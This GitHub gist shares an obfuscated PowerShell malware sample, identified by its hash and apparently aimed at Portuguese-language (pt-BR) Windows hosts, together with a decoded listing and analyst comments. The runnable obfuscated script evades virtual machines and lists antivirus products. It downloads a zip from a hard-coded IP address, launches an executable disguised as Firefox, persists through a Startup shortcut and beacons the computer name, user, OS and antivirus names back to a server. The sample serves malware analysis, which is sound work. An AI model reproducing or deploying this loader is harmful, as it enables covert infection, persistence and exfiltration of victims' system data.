
@JohnLaTwC
Created April 20, 2018 17:30
Brazil PS1 threat
## uploaded by @JohnLaTwC
## sample hash: 4ff21fd53f6ba8d2805574fe21b3a3470c5b719988ecdef59fed4b592c79a61c
function _/=\_____/==\/=\/\
{
# Random alphabetic string generator. Get-Random yields 5..8 and the -le loop
# runs one extra iteration, so the result is 6 to 9 characters long.
# Callers use it to name the dropped .zip and the Startup .lnk, so those
# file names vary per run and are not a stable indicator.
# try/finally with an empty finally and no catch: errors propagate to the caller.
try
{
${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
${/=====\_/\/\_/\_/} = ""
For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++)
{
# Base64 of UTF-16LE "qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM"
# (see the decoded listing further down); re-decoded on every iteration.
${/=\__/==\/\/====\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cQB3AGUAcgB0AHkAdQBpAG8AcABsAGsAagBoAGcAZgBkAHMAYQB6AHgAYwB2AGIAbgBtAFEAVwBFAFIAVABZAFUASQBPAFAAQQBTAEQARgBHAEgASgBLAEwAWgBYAEMAVgBCAE4ATQA=')))
# -Maximum is exclusive and -Minimum is 1, so index 0 ('q') is never picked.
${/===\/\_/====\_/=} = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length
${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1)
${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/}
}
return ${/=====\_/\/\_/\_/}
}
finally{}
}
# Base paths and network endpoints. Every string literal below is base64 of
# UTF-16LE text; the plain-text values appear in the decoded listing further down.
# Drop directory: %LOCALAPPDATA%.
${/===\/\_/==\/=\__} = $env:LOCALAPPDATA
# Check-in URL: "http://174.127.120.3/19/inf.php" + "?pc=" (host fingerprint is appended later).
${_____/=\/\_/==\_/} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AaQBuAGYALgBwAGgAcAA='))) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('PwBwAGMAPQA=')))
# Second-stage archive URL: "http://174.127.120.3/19/1904.zip".
${/=\/=\_/=\__/\/\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwAxADcANAAuADEAMgA3AC4AMQAyADAALgAzAC8AMQA5AC8AMQA5ADAANAAuAHoAaQBwAA==')))
# Executable expected inside the archive: %LOCALAPPDATA%\Firefox.exe (masquerades as the browser).
${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABGAGkAcgBlAGYAbwB4AC4AZQB4AGUA')))
function ___________/===\__
{
# Sandbox / virtual-machine check. Reads only Win32_ComputerSystem.Model and
# compares it with four decoded strings: "VirtualBox", "VMware Virtual Platform",
# "Virtual Machine", "HVM domU". Returns "Y" on a match, otherwise "N"; the
# main block below only proceeds on "N". Note that only the Model property is
# inspected, nothing else about the host.
${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model
if (${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbABCAG8AeAA='))) -or
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBNAHcAYQByAGUAIABWAGkAcgB0AHUAYQBsACAAUABsAGEAdABmAG8AcgBtAA=='))) -or
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VgBpAHIAdAB1AGEAbAAgAE0AYQBjAGgAaQBuAGUA'))) -or
${_/\/\___/=\_/===\} -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABWAE0AIABkAG8AbQBVAA=='))))
{
return "Y"
}
else
{
return "N"
}
}
function ____________/===\_
{
# Returns Win32_OperatingSystem.MUILanguages (a collection of installed UI
# language tags). The main block compares it with "pt-BR" using -eq, which on a
# collection acts as a filter, so the check behaves like "contains pt-BR".
${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem
${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages
return ${/==\/\_/====\_/\/}
}
function __/\/=\/\/\_/\/\_/
{
# Downloader: first parameter is a URL, second the local destination path.
# Uses System.Net.WebClient.DownloadFile (plain HTTP; the URL set above is
# not TLS) and returns "Y". There is no catch block, so a failed download
# throws to the caller; the return value is never checked by the main block.
Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/});
try
{
${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient;
${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/});
return "Y"
}finally{}
}
function _/====\_/=\/=\/\/\ {
# Antivirus enumeration. Queries WMI namespace "root\SecurityCenter2" with
# "SELECT * FROM AntiVirusProduct" (both strings base64/UTF-16LE encoded) and
# returns the displayName(s) of registered AV products. The parameters are only
# forwarded to gwmi via @psboundparameters; the main block calls this with no
# arguments, so nothing is splatted in practice.
[cmdletBinding()]
param (
[string]${___/======\__/==\/} = "${env:___/======\__/==\/}" ,
${_/=\___/===\/\__/=}
)
BEGIN
{
# "SELECT * FROM AntiVirusProduct"
${/=\/=\/=\/\______} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEwARQBDAFQAIAAqACAARgBSAE8ATQAgAEEAbgB0AGkAVgBpAHIAdQBzAFAAcgBvAGQAdQBjAHQA')))
}
PROCESS
{
# Namespace decodes to "root\SecurityCenter2".
${/=\/\/\/=====\_/\} = gwmi -Namespace $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cgBvAG8AdABcAFMAZQBjAHUAcgBpAHQAeQBDAGUAbgB0AGUAcgAyAA=='))) -Query ${/=\/=\/=\/\______} @psboundparameters
return ${/=\/\/\/=====\_/\}.displayName
}
END {
}
}
# Host fingerprint, each value wrapped in parentheses. These variables are
# interpolated into the check-in query string built in the beacon function
# below (pc=<name>&os=<caption>&user=<user>&av=<av>).
# OS caption, e.g. the Windows edition name.
${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")"
# Computer name.
${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")"
# Current user name.
${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")"
# Installed AV product display names (from the SecurityCenter2 query above).
${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")"
# "64 Bits? " + True/False. Collected but not sent in the beacon string.
${_/=\/\/==\_/\/==\} = "("+$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('NgA0ACAAQgBpAHQAcwA/ACAA'))) + [Environment]::Is64BitOperatingSystem+ ")"
# Infection marker: %LOCALAPPDATA%\Chrome.xml. Its existence short-circuits the main block.
${_/=\_/=\/\/\/\/=\} = $env:LOCALAPPDATA + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABDAGgAcgBvAG0AZQAuAHgAbQBsAA==')))
# Download target: %LOCALAPPDATA%\<random 6-9 letters>.zip.
${/====\__/=\_/==\/} = ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB6AGkAcAA=')))
# Persistence: <user Startup folder>\<random 6-9 letters>.lnk (a second random
# name, independent of the .zip name).
${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB0AGEAcgB0AHUAcAA=')))) +"\"+ (_/=\_____/==\/=\/\) + $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBsAG4AawA=')))
function __/==\__/\/====\__
{
# Creates the empty marker file %LOCALAPPDATA%\Chrome.xml (ni = New-Item).
# The main block tests for this file first, so it acts as a "already ran" flag.
ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\}
}
function ___/===\/\_/\__/\/
{
# Check-in beacon. The base64 string decodes to a single-quoted template
# (shown in the decoded listing) that ExpandString fills in at call time:
# "<inf.php?pc=><computer name>&os=<OS caption>&user=<user>&av=<AV names>".
# The response of downloadString is discarded, so this is telemetry only.
${__/====\____/\_/=} = New-Object system.Net.WebClient;
${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwBfAF8AXwAvAD0AXAAvAFwAXwAvAD0APQBcAF8ALwB9ACQAewAvAD0AXAAvAFwAXwAvAD0APQA9AFwAXwAvAD0APQBcAF8AfQAmAG8AcwA9ACQAewBfAF8ALwA9AFwALwA9AFwALwBcAF8ALwA9AFwAXwAvAD0AfQAmAHUAcwBlAHIAPQAkAHsAXwAvAFwALwBcAC8APQBcAF8ALwA9AFwALwA9AD0APQA9AH0AJgBhAHYAPQAkAHsALwA9AD0APQBcAF8AXwBfAF8AXwBfAF8ALwBcAF8AXwBfAH0A'))))
}
function _/==\_/==\_/\/\/\_
{
# Creates the drop directory (%LOCALAPPDATA%). That folder normally already
# exists; New-Item then reports a non-terminating error and, with the default
# ErrorAction, the script simply continues.
ni -ItemType Directory -Path ${/===\/\_/==\/=\__}
}
function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\})
{
# Archive extraction without Expand-Archive: first parameter is the .zip path,
# second the destination folder. Uses the Shell.Application COM object to
# enumerate the zip's items and CopyHere each into the destination namespace.
# NOTE(review): CopyHere is performed by the shell and may return before the
# copy finishes; nothing here waits on it before the later start-process.
${__/\_/\___/=\___/} = new-object -com shell.application
${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/})
foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items())
{
${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\})
}
}
function _/==\_______/=\/==
{
# Persistence via a shortcut: first parameter is the .lnk path (the Startup
# folder entry built above), second the target executable. Uses the
# "WScript.Shell" COM object; the TargetPath template decodes to the second
# parameter's name and is expanded at call time. IconLocation decodes to
# "%SystemRoot%\system32\SHELL32.dll, 41" (a stock shell icon). No catch block.
Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/});
try{
${/=\_/\_/\_/==\__/} = New-Object -com $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAA=')))
${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===})
${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JAB7AF8AXwAvAD0APQA9AD0AXABfAF8AXwAvAFwALwA9AFwAXwAvAH0A')))
${__/\_/\/=\/=\____}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXABzAHkAcwB0AGUAbQAzADIAXABTAEgARQBMAEwAMwAyAC4AZABsAGwALAAgADQAMQA=')))
${__/\_/\/=\/=\____}.Save()
}finally{}
}
# Main flow. Do nothing if the marker file %LOCALAPPDATA%\Chrome.xml exists.
if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\})))
{
}
else
{
# Targeting gate: only continue when the installed UI languages include
# "pt-BR" (the decoded literal) and the VM check returned "N".
if ((____________/===\_) -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cAB0AC0AQgBSAA=='))) -and (___________/===\__) -eq "N")
{
# Order matters for analysts: the marker is written before the download, so
# a failed download still leaves Chrome.xml behind and blocks a re-run.
__/==\__/\/====\__
_/==\_/==\_/\/\/\_
# Download 1904.zip to %LOCALAPPDATA%\<random>.zip.
__/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/}
# Extract the archive into %LOCALAPPDATA%.
___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__}
# Startup-folder .lnk pointing at %LOCALAPPDATA%\Firefox.exe.
_/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\}
# Launch the dropped executable, then send the host fingerprint to inf.php.
start-process ${_/===\/\/\__/===\}
___/===\/\_/\__/\/
}
}
## decodes to:
function _/=\_____/==\/=\/\
{
# Decoded listing (the base64 wrappers replaced with their plain-text values).
# This listing appears to keep the closing parenthesis of the original $(...)
# wrapper after each literal, so it is a reading aid rather than runnable code.
# Random alphabetic string: Get-Random yields 5..8, the -le loop adds one
# iteration, giving 6 to 9 characters. Used to name the dropped .zip and .lnk.
try
{
${/=======\/=\_/\/=} = Get-Random -Minimum 5 -Maximum 9
${/=====\_/\/\_/\_/} = ""
For (${_____/=\_/==\_/\/}=0; ${_____/=\_/==\_/\/} -le ${/=======\/=\_/\/=}; ${_____/=\_/==\_/\/}++)
{
${/=\__/==\/\/====\} = $('qwertyuioplkjhgfdsazxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM'))
# -Maximum is exclusive and -Minimum is 1, so index 0 ('q') is never picked.
${/===\/\_/====\_/=} = Get-Random -Minimum 1 -Maximum ${/=\__/==\/\/====\}.Length
${/=\________/=\__/} = ${/=\__/==\/\/====\}.Substring(${/===\/\_/====\_/=},1)
${/=====\_/\/\_/\_/} = ${/=====\_/\/\_/\_/}+${/=\________/=\__/}
}
return ${/=====\_/\/\_/\_/}
}
finally{}
}
# Drop directory, check-in URL (with "?pc=" prefix for the hostname),
# second-stage archive URL, and the path of the executable expected inside
# the archive, which masquerades as Firefox under %LOCALAPPDATA%.
${/===\/\_/==\/=\__} = $env:LOCALAPPDATA
${_____/=\/\_/==\_/} = $('http://174.127.120.3/19/inf.php')) + $('?pc='))
${/=\/=\_/=\__/\/\_} = $('http://174.127.120.3/19/1904.zip'))
${_/===\/\/\__/===\} = ${/===\/\_/==\/=\__} + $('\Firefox.exe'))
function ___________/===\__
{
# VM check on Win32_ComputerSystem.Model only: "Y" if it matches one of the
# four hypervisor model strings below, otherwise "N". The main block proceeds
# only on "N".
${_/\/\___/=\_/===\} = gwmi -Class Win32_ComputerSystem |select -ExpandProperty Model
if (${_/\/\___/=\_/===\} -eq $('VirtualBox')) -or
${_/\/\___/=\_/===\} -eq $('VMware Virtual Platform')) -or
${_/\/\___/=\_/===\} -eq $('Virtual Machine')) -or
${_/\/\___/=\_/===\} -eq $('HVM domU')))
{
return "Y"
}
else
{
return "N"
}
}
function ____________/===\_
{
# Returns the MUILanguages collection of Win32_OperatingSystem; the main
# block's -eq 'pt-BR' on it behaves as a contains-check.
${/\____/==\/==\/==} = gwmi -Class Win32_OperatingSystem
${/==\/\_/====\_/\/} = ${/\____/==\/==\/==}.MUILanguages
return ${/==\/\_/====\_/\/}
}
function __/\/=\/\/\_/\/\_/
{
# Downloader (URL, destination path) via WebClient.DownloadFile over plain
# HTTP. Returns "Y"; no catch, so failures throw to the caller, which never
# checks the return value.
Param([string]${________/\/=\/\___},[string]${_/==\___/====\___/});
try
{
${_/\_/\/\_/\/=\/==} = new-object System.Net.WebClient;
${_/\_/\/\_/\/=\/==}.DownloadFile(${________/\/=\/\___},${_/==\___/====\___/});
return "Y"
}finally{}
}
function _/====\_/=\/=\/\/\ {
# AV enumeration: queries root\SecurityCenter2 for AntiVirusProduct and
# returns displayName(s). Parameters are only splatted to gwmi; the main
# block calls this with no arguments.
[cmdletBinding()]
param (
[string]${___/======\__/==\/} = "${env:___/======\__/==\/}" ,
${_/=\___/===\/\__/=}
)
BEGIN
{
${/=\/=\/=\/\______} = $('SELECT * FROM AntiVirusProduct'))
}
PROCESS
{
${/=\/\/\/=====\_/\} = gwmi -Namespace $('root\SecurityCenter2')) -Query ${/=\/=\/=\/\______} @psboundparameters
return ${/=\/\/\/=====\_/\}.displayName
}
END {
}
}
# Host fingerprint fields (OS caption, computer name, user, AV names, 64-bit
# flag), each in parentheses; all but the 64-bit flag are sent in the beacon.
${__/=\/=\/\_/=\_/=} = "("+(gwmi -class Win32_OperatingSystem).Caption+")"
${/=\/\_/===\_/==\_} = "("+(gwmi -Class Win32_ComputerSystem -Property Name).Name + ")"
${_/\/\/=\_/=\/====} = "("+[Environment]::UserName+ ")"
${/===\_______/\___} = "("+(_/====\_/=\/=\/\/\)+ ")"
${_/=\/\/==\_/\/==\} = "("+$('64 Bits? ')) + [Environment]::Is64BitOperatingSystem+ ")"
# Infection marker, download path (random name) and Startup .lnk path
# (a separately generated random name).
${_/=\_/=\/\/\/\/=\} = $env:LOCALAPPDATA + $('\Chrome.xml'))
${/====\__/=\_/==\/} = ${/===\/\_/==\/=\__} +"\"+ (_/=\_____/==\/=\/\) + $('.zip'))
${___/\/\_/\/==\__/} = [Environment]::GetFolderPath($('Startup'))) +"\"+ (_/=\_____/==\/=\/\) + $('.lnk'))
function __/==\__/\/====\__
{
# Creates the empty marker file %LOCALAPPDATA%\Chrome.xml used as a "ran already" flag.
ni -ItemType file -Path ${_/=\_/=\/\/\/\/=\}
}
function ___/===\/\_/\__/\/
{
# Beacon: expands the single-quoted template into
# inf.php?pc=<name>&os=<caption>&user=<user>&av=<av> and GETs it;
# the response is discarded.
${__/====\____/\_/=} = New-Object system.Net.WebClient;
${__/====\____/\_/=}.downloadString($ExecutionContext.InvokeCommand.ExpandString('${_____/=\/\_/==\_/}${/=\/\_/===\_/==\_}&os=${__/=\/=\/\_/=\_/=}&user=${_/\/\/=\_/=\/====}&av=${/===\_______/\___}')))
}
function _/==\_/==\_/\/\/\_
{
# Creates the drop directory (%LOCALAPPDATA%, which normally already exists;
# the resulting New-Item error is non-terminating).
ni -ItemType Directory -Path ${/===\/\_/==\/=\__}
}
function ___/\___/===\/\/==(${____/==\__/\/==\_/}, ${_/=\___/\/\/\_/==\})
{
# Zip extraction (zip path, destination) through the Shell.Application COM
# object: each item of the archive namespace is CopyHere'd into the destination.
# NOTE(review): the copy is done by the shell and is not waited on here.
${__/\_/\___/=\___/} = new-object -com shell.application
${____/==\_/===\/==} = ${__/\_/\___/=\___/}.NameSpace(${____/==\__/\/==\_/})
foreach(${__/===\__/\/\_/=\} in ${____/==\_/===\/==}.items())
{
${__/\_/\___/=\___/}.Namespace(${_/=\___/\/\/\_/==\}).copyhere(${__/===\__/\/\_/=\})
}
}
function _/==\_______/=\/==
{
# Creates a .lnk (first parameter) whose TargetPath is the second parameter,
# via WScript.Shell; the icon is a stock SHELL32.dll icon. No catch block.
Param([string]${_/\___________/===},[string]${__/====\___/\/=\_/});
try{
${/=\_/\_/\_/==\__/} = New-Object -com $('WScript.Shell'))
${__/\_/\/=\/=\____} = ${/=\_/\_/\_/==\__/}.CreateShortcut(${_/\___________/===})
${__/\_/\/=\/=\____}.TargetPath = $ExecutionContext.InvokeCommand.ExpandString('${__/====\___/\/=\_/}'))
${__/\_/\/=\/=\____}.IconLocation = $('%SystemRoot%\system32\SHELL32.dll, 41'))
${__/\_/\/=\/=\____}.Save()
}finally{}
}
# Main flow: skip entirely if the Chrome.xml marker exists; otherwise, only
# on hosts whose UI languages include pt-BR and that are not detected as VMs:
# write marker, ensure drop dir, download and extract 1904.zip, create the
# Startup .lnk to Firefox.exe, launch it, then beacon the host fingerprint.
# The marker is written before the download, so a failed download still
# blocks any later re-run.
if (([System.IO.File]::Exists(${_/=\_/=\/\/\/\/=\})))
{
}
else
{
if ((____________/===\_) -eq $('pt-BR')) -and (___________/===\__) -eq "N")
{
__/==\__/\/====\__
_/==\_/==\_/\/\/\_
__/\/=\/\/\_/\/\_/ -________/\/=\/\___ ${/=\/=\_/=\__/\/\_} -_/==\___/====\___/ ${/====\__/=\_/==\/}
___/\___/===\/\/== ${/====\__/=\_/==\/} ${/===\/\_/==\/=\__}
_/==\_______/=\/== -_/\___________/=== ${___/\/\_/\/==\__/} -__/====\___/\/=\_/ ${_/===\/\/\__/===\}
start-process ${_/===\/\/\__/===\}
___/===\/\_/\__/\/
}
}
@msmarcal

I've found something interesting. I'm not a PowerShell specialist, but it seems to try to get information from Microsoft Outlook: https://gist.github.com/msmarcal/5255423dd964f96cb65c67a0b2c210b2
